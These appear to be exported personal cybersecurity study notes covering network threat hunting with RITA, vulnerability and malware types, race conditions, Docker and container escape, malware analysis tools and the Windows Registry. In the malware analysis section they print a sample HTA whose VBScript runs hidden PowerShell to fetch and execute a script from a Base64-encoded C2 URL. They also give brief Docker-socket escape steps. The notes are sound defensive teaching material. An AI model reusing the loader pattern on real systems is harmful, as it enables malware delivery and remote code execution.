To search, we need to enter a forward slash (/). We can then enter our search term and narrow down the results. The search utility supports the use of search fields. When we enter ? while in search mode, we can see an overview of the search fields, alongside some examples. The image below shows the help for the search utility. To exit the help page, enter ? again. Enter the escape key ("esc") to exit the search functionality.

![[attachments/66c44fd9733427ea1181ad58-1761301233135.png|RITA - Search help]]

Results pane
The results pane includes information for each entry that can quickly help us recognize potential threats. The following columns are included:

Severity: A score calculated based on the results of threat modifiers (discussed below)
Source and destination IP/FQDN
Beacon likelihood
Duration of the connection: Long connections can be indicators of compromise. Most application layer protocols are stateless and close the connection quickly after exchanging data (exceptions are SSH, RDP, and VNC).
Subdomains: Connections to subdomains with the same domain name. If there are many subdomains, it could indicate the use of a C2 beacon or other techniques for data exfiltration.
Threat intel: lists any matches on threat intel feeds

We can see two interesting findings: an FQDN pointing to sunshine-bizrate-inc-software[.]trycloudflare[.]com and an IP 91[.]134[.]150[.]150. Move the keyboard arrows to select the first entry. You should then see detailed information in the right pane.

![[attachments/66c44fd9733427ea1181ad58-1761301302504.png|RITA - Details]]

Details pane
Apart from the Source and Destination, we have two information categories: Threat Modifiers and Connection info. Let's have a closer look at these categories:

Threat Modifiers
These are criteria to determine the severity and likelihood of a potential threat. The following modifiers are available:

MIME type/URI mismatch: Flags connections where the MIME type reported in the HTTP header doesn't match the URI. This can indicate an attacker is trying to trick the browser or a security tool.
Rare signature: Points to unusual patterns that attackers might overlook, such as a unique user agent string that is not seen in any other connections on the network.
Prevalence: Analyzes the number of internal hosts communicating with a specific external host. A low percentage of internal hosts communicating with an external one can be suspicious.
First Seen: Checks the date an external host was first observed on the network. A new host on the network is more likely to be a potential threat.
Missing host header: Identifies HTTP connections that are missing the host header, which is often an oversight by attackers or a sign of a misconfigured system.
Large amount of outgoing data: Flags connections that send a very large amount of data out from the network.
No direct connections: Flags connections that don't have any direct connections, which can be a sign of a more complex or hidden command and control communication.

Connection Info
Here, we can find the connections' metadata and basic connection info like:

Connection count: Shows the number of connections initiated between the source and destination. A very high number can be an indicator of C2 beacon activity.
Total bytes sent: Displays the total amount of bytes sent from source to destination. If this is a very high number, it could be an indication of data exfiltration.
Port number - Protocol - Service: If the port number is non-standard, it warrants further investigation. The lack of SSL in the Service info could also be an indicator that warrants further investigation.

[Vault: Root] Vulns & Attacks

Tue, 23 Dec 2025 18:07:03 GMT

Vulnerabilities

Security vulnerabilities are any kind of software or hardware defect. A program written to take advantage of a known vulnerability is referred to as an exploit. A cybercriminal can use an exploit against a vulnerability to carry out an attack, the goal of which is to gain access to a system, the data it hosts or a specific resource.

Vulnerability Management

The process of finding and patching vulnerabilities.

Identify vulns
Consider potential exploits
Prepare defences against threats
Evaluate those defenses

Hardware Vulnerabilty

Hardware vulnerabilities are most often the result of hardware design flaws. eg:

Rowhammer
Meltdown
Spectre

Software Vulnerability

Software vulnerabilities are usually introduced by errors in the operating system or application code.

Input Validation and Injection Vulnerabilities

Programs often require data input, but this incoming data could have malicious content, designed to force the program to behave in an unintended way.

[[Injection Based vulnerabilities]]
- [[SQLi]]
- [[XSS - Cross-Site Scripting]]
- [[CSRF]]
- [[XXE]]
[[File Upload Vulnerabilities|File uploads]]

Access control problems

Access control is the process of controlling who does what and ranges from managing physical access to equipment to dictating who has access to a resource, such as a file, and what they can do with it, such as read or change the file. Many security vulnerabilities are created by the improper use of access controls.

[[Authentication Based Vulnerabilities]]
[[Autherization Based Vulnerabilities]]
- [[IDOR - Insecure direct object reference]]

Buffer overflow

Buffers are memory areas allocated to an application. A vulnerability occurs when data is written beyond the limits of a buffer. By changing data beyond the boundaries of a buffer, the application can access memory allocated to other processes. This can lead to a system crash or data compromise, or provide escalation of privileges.

[[Race conditions]]

This vulnerability describes a situation where the output of an event depends on ordered or timed outputs. A race condition becomes a source of vulnerability when the required ordered or timed events do not occur in the correct order or at the proper time.

Cryptographic & Security Practice Flaws

Systems and sensitive data can be protected through techniques such as authentication, authorization and encryption. Developers should stick to using security techniques and libraries that have already been created, tested and verified and should not attempt to create their own security algorithms. These will only likely introduce new vulnerabilities.

[[Clickjacking & Cookie Manipulation Attacks]]
[[Path Traversal]]
[[LFD, LFI and RFI]]
[[insecure Coding practises]]

Attacks

In cybersecurity, an attack is any intentional action taken by a threat actor to compromise the confidentiality, integrity, or availability (CIA triad) of a system, network, application, or data.

An attack is a deliberate attempt to exploit a vulnerability in order to gain unauthorized access, cause disruption, or steal/damage information.

Common Attacks

A computer virus is malicious code written to interfere with computer operations and cause damage to data and software. Today, viruses are more commonly referred to as malware, which is software designed to harm devices or networks.

In 1986, the Alvi brothers created the Brain virus, although the intention of the virus was to track illegal copies of medical software and prevent pirated licenses
In 1988, Robert Morris developed a program to assess the size of the internet. The program crawled the web and installed itself onto other computers to tally the number of computers that were connected to the internet.The program, however, failed to keep track of the computers it had already compromised and continued to re-install itself until the computers ran out of memory and crashed. About 6,000 computers were affected, representing 10% of the internet at the time. This attack cost millions of dollars in damages due to business disruptions and the efforts required to remove the worm. After the Morris worm, Computer Emergency Response Teams, known as CERTs®, were established to respond to computer security incidents. CERTs still exist today, but their place in the security industry has expanded to include more responsibilities.

Social engineering is a manipulation technique that exploits human error to gain private information, access, or valuables.

eg: Loveletter attack.in year 2000, Onel De Guzman created the LoveLetter malware to steal internet login credentials.

Phishing is the use of digital communications to trick people into revealing sensitive data or deploying malicious software.

the Equifax breach. In 2017, attackers successfully infiltrated the credit reporting agency, Equifax. This resulted in one of the largest known data breaches of sensitive information. Over 143 million customer records were stolen, and the breach affected approximately 40% of all Americans.

Attack types

[[Social Engineering]]

[[Network Attacks]]

Physical attack

A physical attack is a security incident that affects not only digital but also physical environments where the incident is deployed. Some forms of physical attacks are:

Malicious USB cable
Malicious flash drive
Card cloning and skimming Physical attacks fall under the asset security domain.

Adversarial artificial intelligence

Adversarial artificial intelligence is a technique that manipulates artificial intelligence and machine learning technology to conduct attacks more efficiently. Adversarial artificial intelligence falls under both the communication and network security and the identity and access management domains.

Supply-chain attack

A supply-chain attack targets systems, applications, hardware, and/or software to locate a vulnerability where malware can be deployed. Because every item sold undergoes a process that involves third parties, this means that the security breach can occur at any point in the supply chain. These attacks are costly because they can affect multiple organizations and the individuals who work for them. Supply-chain attacks can fall under several domains, including but not limited to the security and risk management, security architecture and engineering, and security operations domains.

Cryptographic attack

A cryptographic attack affects secure forms of communication between a sender and intended recipient. Some forms of cryptographic attacks are:

Birthday
Collision
Downgrade Cryptographic attacks fall under the communication and network security domain.

Malware

Spyware

Designed to track and spy on you, spyware monitors your online activity and can log every key you press on your keyboard, as well as capture almost any of your data, including sensitive personal information such as your online banking details. Spyware does this by modifying the security settings on your devices. It often bundles itself with legitimate software or Trojan horses.

Adware

Adware is often installed with some versions of software and is designed to automatically deliver advertisements to a user, most often on a web browser. You know it when you see it! It’s hard to ignore when you’re faced with constant pop-up ads on your screen. It is common for adware to come with spyware.

Backdoor

This type of malware is used to gain unauthorized access by bypassing the normal authentication procedures to access a system. As a result, hackers can gain remote access to resources within an application and issue remote system commands. A backdoor works in the background and is difficult to detect.

Ransomware

This malware is designed to hold a computer system or the data it contains captive until a payment is made. Ransomware usually works by encrypting your data so that you can’t access it. Some versions of ransomware can take advantage of specific system vulnerabilities to lock it down. Ransomware is often spread through phishing emails that encourage you to download a malicious attachment or through a software vulnerability.

Scareware

This is a type of malware that uses 'scare’ tactics to trick you into taking a specific action. Scareware mainly consists of operating system style windows that pop up to warn you that your system is at risk and needs to run a specific program for it to return to normal operation. If you agree to execute the specific program, your system will become infected with malware.

Rootkit

This malware is designed to modify the operating system to create a backdoor, which attackers can then use to access your computer remotely. Most rootkits take advantage of software vulnerabilities to gain access to resources that normally shouldn’t be accessible (privilege escalation) and modify system files. Rootkits can also modify system forensics and monitoring tools, making them very hard to detect. In most cases, a computer infected by a rootkit has to be wiped and any required software reinstalled.

This kind of malware is often spread by a combination of two components: a dropper and a loader. A dropper is a type of malware that comes packed with malicious code which is delivered and installed onto a target system. For example, a dropper is often disguised as a legitimate file, such as a document, an image, or an executable to deceive its target into opening, or dropping it, onto their device. If the user opens the dropper program, its malicious code is executed and it hides itself on the target system.

Multi-staged malware attacks, where multiple packets of malicious code are deployed, commonly use a variation called a loader. A loader is a type of malware that downloads strains of malicious code from an external source and installs them onto a target system.

Virus

A virus is a type of computer program that, when executed, replicates and attaches itself to other executable files, such as a document, by inserting its own code. Most viruses require end-user interaction to initiate activation and can be written to act on a specific date or time. Viruses can be relatively harmless, such as those that display a funny image. Or they can be destructive, such as those that modify or delete data. Viruses can also be programmed to mutate in order to avoid detection. Most viruses are spread by USB drives, optical disks, network shares or email.

Trojan horse

This malware carries out malicious operations by masking its true intent. It might appear legitimate but is, in fact, very dangerous. Trojans exploit your user privileges and are most often found in image files, audio files or games. Unlike viruses, Trojans do not self-replicate but act as a decoy to sneak malicious software past unsuspecting users.

Worms

This is a type of malware that replicates itself in order to spread from one computer to another. Unlike a virus, which requires a host program to run, worms can run by themselves. Other than the initial infection of the host, they do not require user participation and can spread very quickly over the network. Worms share similar patterns: They exploit system vulnerabilities, they have a way to propagate themselves, and they all contain malicious code (payload) to cause damage to computer systems or networks. Worms are responsible for some of the most devastating attacks on the Internet. In 2001, the Code Red worm had infected over 300,000 servers in just 19 hours.

[[DoS and DDoS Attacks]]

On-Path Attacks - [[MITM or On-Path Attacks]]

On-path attackers intercept or modify communications between two devices, such as a web browser and a web server, either to collect information from or to impersonate one of the devices. This type of attack is also referred to as a man-in-the-middle or man-in-the-mobile attack.

A MitM attack happens when a cybercriminal takes control of a device without the user’s knowledge. With this level of access, an attacker can intercept and capture user information before it is sent to its intended destination. These types of attacks are often used to steal financial information.

There are many types of malware that possess MitM attack capabilities. A variation of man-in-middle, MitMo is a type of attack used to take control over a user’s mobile device. When infected, the mobile device is instructed to exfiltrate user-sensitive information and send it to the attackers. ZeuS is one example of a malware package with MitMo capabilities. It allows attackers to quietly capture two-step verification SMS messages that are sent to users.

SEO Poisoning

You’ve probably heard of search engine optimization or SEO which, in simple terms, is about improving an organization’s website so that it gains greater visibility in search engine results. Search engines such as Google work by presenting a list of web pages to users based on their search query. These web pages are ranked according to the relevancy of their content. While many legitimate companies specialize in optimizing websites to better position them, attackers take advantage of popular search terms and use SEO to push malicious sites higher up the ranks of search results. This technique is called SEO poisoning. The most common goal of SEO poisoning is to increase traffic to malicious sites that may host malware or attempt social engineering.

Wi-Fi Password Cracking

We are able to identify unencrypted passwords by listening in and capturing packets sent on the network. This is called network sniffing. If the password is encrypted, they may still be able to reveal it using a password cracking tool.

[[Password Attacks]]

Advanced Persistent Threats

Attackers also achieve infiltration through advanced persistent threats (APTs) — a multi-phase, long term, stealthy and advanced operation against a specific target. For these reasons, an individual attacker often lacks the skill set, resources or persistence to perform APTs. Due to the complexity and the skill level required to carry out such an attack, an APT is usually well-funded and typically targets organizations or nations for business or political reasons. Its main purpose is to deploy customized malware on one or more of the target’s systems and remain there undetected.

[Vault: Vulns & Attacks] Race conditions

Tue, 23 Dec 2025 18:07:03 GMT

In web applications, this often happens when multiple users or automated requests simultaneously access or modify shared resources, such as inventory or account balances. If proper synchronisation isn’t in place, this can lead to unexpected results, such as duplicate transactions, oversold items, or unauthorised data changes.

Types of Race Conditions

Generally, race condition attacks can be divided into three categories:

Time-of-Check to Time-of-Use (TOCTOU): A TOCTOU race condition happens when a program checks something first and uses it later, but the data changes in between. This means what was true at the time of the check might no longer be true when the action happens. It’s like checking if a toy is in stock, and by the time you click "Buy" someone else has already bought it. For example, two users buy the same "last item" at the same time because the stock was checked before it was updated.
Shared resource: This occurs when multiple users or systems try to change the same data simultaneously without proper control. Since both updates happen together, the final result depends on which one finishes last, creating confusion. Think of two cashiers updating the same inventory spreadsheet at once, and one overwrites the other’s work.
Atomicity violation: An atomic operation should happen all at once, either fully done or not at all. When parts of a process run separately, another request can sneak in between and cause inconsistent results. It’s like paying for an item, but before the system confirms it, someone else changes the price. For example, a payment is recorded, but the order confirmation fails because another request interrupts the process.

We can use Send Group (parallel) in [[Burpsuite]] Repeater to try and exploit race conditions.

Copy a request to repeater.
add the tab to a group.
duplicate the tab with necessary numbers.
use the Repeater toolbar Send dropdown menu and select Send group in parallel (last-byte sync), which launches all copies at once and waits for the final byte from each response, maximising the timing overlap to trigger race conditions.
click Send group (parallel); this will launch all requests to the server simultaneously. The server will attempt to handle them simultaneously, which may cause a timing bug to appear.

Mitigation

Use atomic database transactions so stock deduction and order creation execute as a single, consistent operation.
Perform a final stock validation right before committing the transaction to prevent overselling.
Implement idempotency keys for checkout requests to ensure duplicates aren’t processed multiple times.
Apply rate limiting or concurrency controls to block rapid, repeated checkout attempts from the same user or session.

[Vault: Root] Docker

Tue, 23 Dec 2025 17:44:32 GMT

Docker is an open-source platform for developers to build, deploy, and manage containers. Containers are executable units of software which package and manage the software and components to run a service. Unlike virtual machines, containers share the host's operating system kernel, making them significantly more lightweight and faster to start.

Docs: https://docs.docker.com/

Core concepts

Images: Read-only blueprints containing the application code, libraries, and dependencies.
Containers: Runnable instances of an image that provide a secure and isolated workspace.
Dockerfile: A text file with instructions on how to build a Docker image.
Volumes: The preferred way to persist data. Since containers are ephemeral (data is lost when they are deleted), volumes store information on the host machine to keep it safe.
Networks: These allow containers to communicate with each other or the outside world securely. The default driver is the bridge network.
Docker Compose: A tool for defining and running multi-container applications using a single YAML file.
Docker Hub: A cloud-based registry for finding and sharing container images.

Architecture

Docker Daemon (dockerd): The "brain" of the system. This background process manages all Docker objects, including images, containers, networks, and volumes.
Docker Client: The primary way you interact with Docker. When you type a command like docker run, the client sends that request to the daemon via a REST API.
Docker Host: The physical or virtual machine where the Docker Engine actually runs. It contains the daemon, images, and running containers.
Docker Registry: A centralized storage system for sharing images. Docker Hub is the default public registry, but organizations often use private ones like Amazon ECR or Google Artifact Registry.

Common Commands

docker build -t <name> . : Builds an image from a Dockerfile.
docker run -p <host_port>:<container_port> <image> : Creates and starts a container with port mapping.
docker ps : Lists all currently running containers.
docker stop <container_id> : Gracefully halts a running container.
docker pull <image_name> : Downloads an image from Docker Hub.
docker rm <container_id> : Deletes a stopped container.
docker exec -it [containername] [command] : To run a command inside a docker container:
Docker engine installation guide: https://docs.docker.com/engine/install/
You can also Docker Desktop to manage docker containers.
Lazydocker is a TUI program to manage docker from the terminal.

Security Testing

The Docker documentation mentions that by default, there is a setting called “Enhanced Container Isolation” which blocks containers from mounting the Docker socket to prevent malicious access to the Docker Engine. In some cases, like when running test containers, they need Docker socket access. The socket provides a means to access containers via the API directly. Let's see if we can. try ls -la /var/run/docker.sock. If we can see it, it means we can run access the docker socket from inside the docker container.

By running docker ps again, we can confirm we can perform Docker commands and interact with the API; in other words, we can perform a Docker Escape attack!

[Vault: Offensive Security] Malware Analysis

Tue, 23 Dec 2025 17:44:32 GMT

Malware analysis is the process of examining a malicious file to understand its functionality, operation, and methods for defence against it. By analysing a malicious file or application, we can see exactly how it operates, and therefore, know how to prevent it.

There are two main branches of malware analysis: static and dynamic. Static analysis focuses on inspecting a file without executing it, whereas dynamic analysis involves execution.

Static Analysis

The process of analyzing malware without executing it, but in a controlled environment.

[[PeStudio]] Static analysis can be a quick and effective way to understand how the sample may operate, as well as how it can be identified. Some of the information that can be gathered from static analysis has been included in the table below:

| | | | |---|---|---| |Information|Explanation|Example| |Checksums|These checksums are used within cyber security to track and catalogue files and executables. For example, you can Google the checksum to see if this has been identified before.|a93f7e8c4d21b19f2e12f09a5c33e48a| |Strings|"Strings" are sequences of readable characters within an executable. This could be, for example, IP addresses, URLs, commands, or even passwords!|138.62.51.186| |Imports|"Imports" are a list of libraries and functions that the application depends upon. For example, rather than building everything from scratch, applications will use operating system functions and libraries to interact with the OS.These are useful, especially in Windows, as they allow you to see how the application interacts with the system.|CreateFileWThis library is used to create a file on a Windows system.| |Resources|"Resources" contain data such as the icon that is displayed to the user. This is useful to examine, especially since malware might use a Word document icon to trick the user. Additionally, malware itself has been known to hide in this section!|N/A|

However, it's important to note that regardless of how a sample may appear or function, we don't truly know until it's executed. Attackers use techniques such as obfuscation to obscure how the sample appears, primarily to evade anti-viruses but also to evade a curious analyst.

Dynamic Analysis

The process of analyzing malware by running it in a controlled environment like a sandbox.

[[Regshot]]
[[ProcMon]]

HTA Analysis

HTML Application (HTA) files are files that contain HTML, JScript, and or VBScript code that can be executed on client system. This can to lead to more dynamic applications or remote code execution on a client or victim.

Unlike regular web pages that open inside a browser, HTA files run directly on Windows through a built-in component called Microsoft HTML Application Host - mshta.exe process. This allows them to look and behave like lightweight programs with their own interfaces and actions.

HTA File Structure

very similar to a regular HTML page. An HTA file usually contains three main parts:

The HTA declaration: This defines the file as an HTML Application and can include basic properties like title, window size, and behaviour.
The interface (HTML and CSS): This section creates the layout and visuals, such as buttons, forms, or text.
The script (VBScript or JavaScript): Here is where the logic lives; it defines what actions the HTA will perform when opened or when a user interacts with it.

eg: This small example creates a simple desktop window with a button that shows a message when clicked.

<html>
<head>
    <title>TBFC Utility Tool</title>
    <HTA:APPLICATION 
        ID="TBFCApp"
        APPLICATIONNAME="Utility Tool"
        BORDER="thin"
        CAPTION="yes"
        SHOWINTASKBAR="yes"
    />
</head>

<body>
    <h3>Welcome to the TBFC Utility Tool</h3>
    <input type="button" value="Say Hello" onclick="MsgBox('Hello from Wareville!')">
</body>
</html>

How attackers use HTA

HTA files are attractive to attackers because they combine familiar web markup with script execution on Windows. Common purposes of malicious HTA use:

Initial access/delivery: HTA files are often delivered by phishing (email attachments, fake web pages, or downloads) and run via mshta.exe.
Downloaders/droppers: An HTA can execute a script that fetches additional binaries or scripts from the attacker's C2.
Obfuscation/evasion: HTAs can hide intent by embedding encoded data(Base64), by using short VBScript/JScript fragments, or by launching processes with hidden windows.
Living-off-the-land: HTA commonly calls built-in Windows tools (mshta.exe, powershell.exe, wscript.exe, rundll32.exe) to avoid adding new binaries to disk.

Inside an HTA, you'll often find a small script that may be obfuscated or encoded. In practice, this tiny script usually does one of two things: downloads and runs a second-stage payload, or opens a remote control channel to let something else talk back to the attacker's server. These lightweight scripts are the reason HTAs are effective launchers, a single small file can pull in the rest of the malware. eg:

<html>
  <head>
    <title>Angry King Malhare</title>
    <HTA:APPLICATION ID="Malhare" APPLICATIONNAME="B" BORDER="none"      SHOWINTASKBAR="no" SINGLEINSTANCE="yes" WINDOWSTATE="minimize">
    </HTA:APPLICATION>
    <script language="VBScript">
      Option Explicit:Dim a:Set a=CreateObject("WScript.Shell"):Dim       b:b="powershell -NoProfile -ExecutionPolicy Bypass -Command ""       {$U=      [System.Text.Encoding]::UTF8.GetString([System.Convert]::      FromBase64String('aHR0cHM6Ly9yYXcua2luZy1tYWxoYXJlWy5dY29tL2MyL3NpbHZlci9yZWZzL2hlYWRzL21haW4vUkVEQUNURUQudHh0'))       $C=(Invoke-WebRequest -Uri       $U -UseBasicParsing).Content       $B=[scriptblock]::Create($C) $B}""":a.Run       b,0,True:self.close
    </script>
  </head>
  <body>
  </body>
</html>

When analysing HTAs, the <title> and HTA:APPLICATION tags often reveal how attackers disguise malicious apps. They might use a convincing name like ‘Salary Survey’ or ‘Internal Tool’ to appear safe, always check these first

Secondly, there’s a VBScript block marked by </script language="VBScript"> that’s the active part of the file where attackers often embed encoded commands or call external resources. Inside this block we find a PowerShell command b:b="powershell -NoProfile -ExecutionPolicy Bypass -Command, a pattern commonly seen in malicious HTAs used for delivery or launching. The PowerShell invocation contains a Base64-encoded blob - FromBase64String. This is likely a pointer to further instructions or a downloaded payload. If you see an encoded string, assume it hides a URL. Decoding it reveals the attacker’s command-and-control (C2) address or a resource used in the attack. Always decode before assuming what it does.

Malware authors often use multiple layers of encoding and encryption such as Base64 for obfuscation as some form of encryption or cipher to conceal the true payload. When you decode the Base64, check whether the output still looks like gibberish; if so, a second decryption step is needed.

After the encoded PowerShell command, we can see three key variables: $U, $C, and $B. Let’s quickly break down what each does:

$U: Holds the decoded URL, the location from which the next script or payload will be fetched.
$C: Stores the content downloaded from that URL, usually a PowerShell script or text instructions.
$B: Converts that content into an executable scriptblock and runs it directly in memory.

Whenever you see a chain of variables like this, try to trace where each one is created, used, and passed. If a variable ends up inside a function like Run, Execute, or Eval, that’s a sign that downloaded data is being executed, a key indicator of malicious activity.

As a summary, the process for reviewing a suspicious HTA can be broken down into three main steps:

Identify the scripts section (VBScript)
Look for encoded data or external connections (e.g. Base64, HTTP requests)
Follow the logic to see what's execute or being sent out.

[Vault: Tools] PeStudio

Tue, 23 Dec 2025 17:44:32 GMT

PeStudio is a tool to find suspicious artifacts within executable files to accelerate the first malware assessment. Using this tool, the analyst can easily spot the functionalities commonly used for malicious activities by malware creators.

https://www.winitor.com/
First, we will launch PeStudio and load the executable into it.
You can drag and drop the executable into the PeStudio window, or load it by selecting File -> Open File from the toolbar. PeStudio will display some information about the executable.
the **file > sha256** property within the table is of interest. This value is a checksum, which is a unique identifier for the executable. We can keep a note of this SHA256 as threat intelligence.
reviewing the "Strings" of the executable. You can do this by clicking on the "strings" indicator on the left pane of PeStudio.

[Vault: Tools] ProcMon

Tue, 23 Dec 2025 17:44:32 GMT

ProcMon (Process Monitor) from the Sysinternals suite is used to monitor and investigate how processes are interacting with the Windows operating system. It is a powerful tool that allows us to see exactly what a process is doing. For example, reading and writing registry keys, searching for files, or creating network connections.

Open Process Monitor (ProcMon)
Process Monitor will automatically start capturing events of various processes on the system.
Run the sample
To stop capturing more events, click on the Play button in the toolbar of Process Monitor.
To apply some filters, click on the Filter button, and then Filter within the dropdown.
we can apply a filter like
1. Apply the Process Name filter
2. Set the condition to is
3. Put in the name of the process we wish to see within the text area
4. Press the Add button to apply this filter
5. And finally click OK to save.
Now it is much easier to investigate how the process is interacting with the operating system. Here are some Operations that may be of interest to us:
- RegOpenKey
- CreateFile
- TCP Connect
- TCP Recieve 8. You can remove the filters you've previously applied by pressing the filter in the Filter list, and pressing Remove
You can also reset the filters using the Reset Filter option when clicking on the Filter heading.

[Vault: Tools] Regshot

Tue, 23 Dec 2025 17:44:32 GMT

Regshot is a widely used utility, especially when analysing malware on Windows. It works by creating two "snapshots" of the registry—one before the malware is run and another afterwards. The results are then compared to identify any changes.

Malware aims to establish persistence, meaning it seeks to run as soon as the device is switched on. A common technique for malware is to add a Run key into the registry, which is frequently used to specify which applications are automatically executed when the device is powered on.

Let's load up Regshot and create a capture of the registry as it currently exists.
First, change the output directory of the capture to the user's Desktop using the box with three dots in the "Output path" section.
Then, once set, let's create our first snapshot. Press 1st shot and then Shot on the dropdown. Please note that this may take a few minutes to complete.
Now that we have taken a snapshot of the registry, you should proceed with executing the malware sample and take another snapshot. We will then compare the difference.
Once we have executed our sample, let's return to Regshot and capture our second snapshot, using the same procedure as above. Click on the 2nd shot button and press Shot in the dropdown. Regshot is now capturing the registry again, and outputting the differences to a file.
And now, after a few seconds, let's press the Compare button that appears.
We can search for the executable within the log that opens up.

[Vault: System Security] VM & Container Security

Sun, 21 Dec 2025 18:53:02 GMT

Virtual machines (VMs)

Virtual machines (VMs) are software versions of physical computers. VMs provide an additional layer of security for an organization because they can be used to run code in an isolated environment, preventing malicious code from affecting the rest of the computer or system. VMs can also be deleted and replaced by a pristine image after testing malware.

VMs are useful when investigating potentially infected machines or running malware in a constrained environment. Using a VM may prevent damage to your system in the event its tools are used improperly. VMs also give you the ability to revert to a previous state. However, there are still some risks involved with VMs. There’s still a small risk that a malicious program can escape virtualization and access the host machine.

You can test and explore applications easily with VMs, and it’s easy to switch between different VMs from your computer. This can also help in streamlining many security tasks.

Sandbox environments

A sandbox is a type of testing environment that allows you to execute software or programs separate from your network. They are commonly used for testing patches, identifying and addressing bugs, or detecting cybersecurity vulnerabilities. Sandboxes can also be used to evaluate suspicious software, evaluate files containing malicious code, and simulate attack scenarios.

Sandboxes can be stand-alone physical computers that are not connected to a network; however, it is often more time- and cost-effective to use software or cloud-based virtual machines as sandbox environments. Note that some malware authors know how to write code to detect if the malware is executed in a VM or sandbox environment. Attackers can program their malware to behave as harmless software when run inside these types of testing environments.

A VM is supposed to be a completely isolated system. One VM should not have access to resources and data from another VM unless that is strictly allowed and configured.

The hypervisor is the entity that controls and manages the VMs. There are two types of hypervisors:

Type 1 hypervisors (also known as native or bare-metal hypervisors) run directly on the physical (bare-metal) system. Examples of Type 1 hypervisors include VMware ESXi, Proxmox Virtual Environment, Xen, and Microsoft Hyper-V.
Type 2, or hosted, hypervisors run on top of other operating systems. Examples of type 2 hypervisors include VirtualBox and VMware Player or Workstation.

These virtual systems have been susceptible to many vulnerabilities, including the following:

VM escape vulnerabilities: These vulnerabilities allow an attacker to “escape” the VM and obtain access to other virtual machines on the system or access to the hypervisor. An attacker can find a VM escape vulnerability in the underlying hypervisor and uses that vulnerability to access data from another VM.
Hypervisor vulnerabilities such as hyperjacking: Hyperjacking is a vulnerability that could allow an attacker to control the hypervisor. Hyperjacking attacks often require the installation of a malicious (or “fake”) hypervisor that can manage the entire virtual environment. The compromised or fake hypervisor operates in a stealth mode, avoiding detection. Hyperjacking attacks can be launched by injecting a rogue hypervisor beneath the original hypervisor or by directly obtaining control of the original hypervisor. You can also launch a hyperjacking attack by running a rogue hypervisor on top of an existing hypervisor.
VM repository vulnerabilities: Attackers can leverage these vulnerabilities to compromise many systems and applications. There are many public and private VM repositories that users can leverage to deploy VMs, including different operating systems, development tools, databases, and other solutions. Examples include the VMware Marketplace (https://marketplace.cloud.vmware.com/) and AWS Marketplace (https://aws.amazon.com/marketplace). Attackers have found ways to upload fake or impersonated VMs with malicious software and backdoors. These ready-to-use VMs are deployed by many organizations, allowing the attacker to manipulate the user’s systems, applications, and data.

Vulnerabilities Related to Containerized Workloads

Computing has evolved from traditional physical (bare-metal) servers to VMs, containers, and serverless architectures. ![[attachments/VM&ContainerSecurity-img-202510141000.png]]

Vulnerabilities in applications and in open-source software running in containers such as Docker, Rocket, and containerd are often overlooked by developers and IT staff. Attackers may take advantage of these vulnerabilities to compromise applications and data. A variety of security layers apply to containerized workloads:

The container image
Software inside the container
The host operating system
Interaction between containers and the host operating system
Security in runtime environment and orchestration platforms such as Kubernetes

Container escape

A container escape is a technique that enables code running inside a container to obtain rights or execute on the host kernel (or other containers) beyond its isolated environment (escaping). For example, creating a privileged container with access to the public internet from a test container with no internet access.

Containers use a client-server setup on the host. The CLI tools act as the client, sending requests to the container daemon, which handles the actual container management and execution. The runtime exposes an API server via Unix sockets (runtime sockets) to handle CLI and daemon traffic. If an attacker can communicate with that socket from inside the container, they can exploit the runtime (this is how we would create the privileged container with internet access, as mentioned in the previous example).

Key security best practices that organizations should use to create a secure container image

Develop

secure coding practices
shift-left security
build security scanning Deliver
secure repository storage
IaaS
secure user access Deploy
runtime scanning
employ CIS benchmarks
enforce security policies

TIP The CIS Benchmarks for Docker and Kubernetes provide detailed guidance on how to secure Docker containers and Kubernetes deployments. You can access all the CIS Benchmarks at: https://www.cisecurity.org/cis-benchmarks.

Tools to scan Docker images for vulnerabilities and assess Kubernetes deployments

Anchore’s Grype

Grype is an open-source container vulnerability scanner that you can download from https://github.com/anchore/grype.

Clair

Clair is another open-source container vulnerability scanner. You can download it from https://github.com/quay/clair.

Dagda

This set of open-source static analysis tools can help detect vulnerabilities, Trojans, backdoors, and malware in Docker images and containers. It uses the ClamAV antivirus engine to detect malware and vulnerabilities. You can download Dagda from https://github.com/eliasgranderubio/dagda/.

kube-bench

This open-source tool performs a security assessment of Kubernetes clusters based on the CIS Kubernetes Benchmark. You can download kube-bench from https://github.com/aquasecurity/kube-bench.

kube-hunter

This open-source tool is designed to check the security posture of Kubernetes clusters. You can download kube-hunter from https://kube-hunter.aquasec.com/.

Falco

You can download this threat detection engine for Kubernetes from https://falco.org/.

Another strategy that threat actors have used for years is to insert malicious code into Docker images on Docker Hub (https://hub.docker.com). This has been a very effective “supply chain” attack.

[Vault: System Security] Windows Registry

Sun, 21 Dec 2025 18:20:43 GMT

The Windows Registry is a central, hierarchical database storing critical low-level settings, configurations, and options for the Windows operating system, hardware, and installed applications. Accessed via the regedit tool, it organizes data into keys and subkeys, holding user preferences, hardware info, and software settings Key components

Keys/Hives: Like folders, they group related settings (e.g., HKEY_LOCAL_MACHINE for system-wide settings).
Subkeys: Further subdivisions within keys.
Values: The actual data (text, numbers, binary) within keys and subkeys.

|Hive Name|Contains|Location| |---|---|---| |SYSTEM|- Services- Mounted Devices- Boot Configuration- Drivers- Hardware|C:\Windows\System32\config\SYSTEM| |SECURITY|- Local Security Policies- Audit Policy Settings|C:\Windows\System32\config\SECURITY| |SOFTWARE|- Installed Programs- OS Version and other info- Autostarts- Program Settings|C:\Windows\System32\config\SOFTWARE| |SAM|- Usernames and their Metadata- Password Hashes- Group Memberships- Account Statuses|C:\Windows\System32\config\SAM| |NTUSER.DAT|- Recent Files- User Preferences- User-specific Autostarts|C:\Users\username\NTUSER.DAT| |USRCLASS.DAT|- Shellbags- Jump Lists|C:\Users\username\AppData\Local\Microsoft\Windows\USRCLASS.DAT|

Note: The configuration settings stored in each hive listed above are just a few examples. Each hive stores more than these.

Windows organizes all the Registry Hives into these structured Root Keys. Instead of seeing the Registry Hives, you would always get these registry root keys whenever you open the registry. Registry keys with their respective Registry Hives.

